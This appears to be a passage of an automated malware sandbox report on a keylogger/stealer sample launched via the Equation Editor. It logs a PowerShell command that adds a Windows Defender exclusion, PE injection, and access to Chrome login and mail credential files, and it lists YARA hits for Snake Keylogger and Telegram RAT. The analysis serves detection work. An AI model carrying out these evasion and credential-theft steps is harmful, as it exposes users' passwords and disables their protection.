                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeMemory allocated: 1C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeMemory allocated: 24F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeMemory allocated: 1C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeMemory allocated: 5B40000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeMemory allocated: 55A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeMemory allocated: 6B40000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeMemory allocated: 7B40000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeMemory allocated: 230000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeMemory allocated: 2350000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeMemory allocated: 6E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2359Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4645Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeWindow / User API: threadDelayed 9492Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3380Thread sleep time: -420000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exe TID: 3544Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3756Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3764Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exe TID: 3744Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exe TID: 3788Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exe TID: 3788Thread sleep time: -1200000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exe TID: 3792Thread sleep count: 9492 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exe TID: 3792Thread sleep count: 323 > 30Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3872Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeCode function: 8_2_00237200 LdrInitializeThunk,8_2_00237200
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: 5.2.vvndewepeter91026.exe.3722a30.6.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 5.2.vvndewepeter91026.exe.3722a30.6.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 5.2.vvndewepeter91026.exe.3722a30.6.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe"
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe"Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeMemory written: C:\Users\user\AppData\Roaming\vvndewepeter91026.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\vvndewepeter91026.exe "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeProcess created: C:\Users\user\AppData\Roaming\vvndewepeter91026.exe "C:\Users\user\AppData\Roaming\vvndewepeter91026.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeQueries volume information: C:\Users\user\AppData\Roaming\vvndewepeter91026.exe VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeQueries volume information: C:\Users\user\AppData\Roaming\vvndewepeter91026.exe VolumeInformationJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000008.00000002.913786371.0000000002351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 8.2.vvndewepeter91026.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.vvndewepeter91026.exe.3588d18.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.vvndewepeter91026.exe.3722a30.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.vvndewepeter91026.exe.3722a30.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.vvndewepeter91026.exe.3588d18.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.406724627.000000000369E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.406724627.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vvndewepeter91026.exe PID: 3524, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vvndewepeter91026.exe PID: 3616, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 8.2.vvndewepeter91026.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.vvndewepeter91026.exe.3588d18.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.vvndewepeter91026.exe.3722a30.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.vvndewepeter91026.exe.3722a30.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.vvndewepeter91026.exe.3588d18.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.406724627.000000000369E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.406724627.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vvndewepeter91026.exe PID: 3524, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vvndewepeter91026.exe PID: 3616, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\AppData\Roaming\vvndewepeter91026.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: Yara matchFile source: 8.2.vvndewepeter91026.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.vvndewepeter91026.exe.3588d18.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.vvndewepeter91026.exe.3722a30.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.vvndewepeter91026.exe.3722a30.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.vvndewepeter91026.exe.3588d18.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.406724627.000000000369E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.406724627.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vvndewepeter91026.exe PID: 3524, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vvndewepeter91026.exe PID: 3616, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000008.00000002.913786371.0000000002351000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 8.2.vvndewepeter91026.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.vvndewepeter91026.exe.3588d18.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.vvndewepeter91026.exe.3722a30.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.vvndewepeter91026.exe.3722a30.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.vvndewepeter91026.exe.3588d18.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.406724627.000000000369E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.406724627.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vvndewepeter91026.exe PID: 3524, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vvndewepeter91026.exe PID: 3616, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 8.2.vvndewepeter91026.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.vvndewepeter91026.exe.3588d18.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.vvndewepeter91026.exe.3722a30.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.vvndewepeter91026.exe.3722a30.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.vvndewepeter91026.exe.3588d18.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.913113287.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.406724627.000000000369E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.406724627.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: vvndewepeter91026.exe PID: 3524, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vvndewepeter91026.exe PID: 3616, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts33
                  Exploitation for Client Execution                  		Boot or Logon Initialization Scripts111
                  Process Injection                  		1
